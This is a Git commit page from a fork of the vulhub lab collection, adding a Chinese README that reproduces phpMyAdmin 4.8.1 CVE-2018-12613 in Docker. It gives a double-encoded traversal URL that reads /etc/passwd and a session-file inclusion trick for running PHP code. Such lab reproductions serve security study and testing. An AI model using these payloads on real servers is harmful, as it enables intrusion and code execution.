aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

28
phpmyadmin/CVE-2018-12613/README.zh-cn.md Normal file
View File

@@ -0,0 +1,28 @@
# phpmyadmin 4.8.1 远程文件包含漏洞CVE-2018-12613
phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑通过二次编码即可绕过检查造成远程文件包含漏洞。
参考文档:
- https://mp.weixin.qq.com/s/HZcS2HdUtqz10jUEN57aog
- https://www.phpmyadmin.net/security/PMASA-2018-4/
## 漏洞环境
执行如下命令启动phpmyadmin 4.8.1
```
docker compose up -d
```
环境启动后,访问`http://your-ip:8080`即可进入phpmyadmin。配置的是“config”模式所以无需输入密码直接登录test账户。
## 漏洞复现
访问`http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd`,可见`/etc/passwd`被读取,说明文件包含漏洞存在:
![](1.png)
利用方式也比较简单,可以执行一下`SELECT '<?=phpinfo()?>';`然后查看自己的sessionidcookie中phpMyAdmin的值然后包含session文件即可
![](2.png)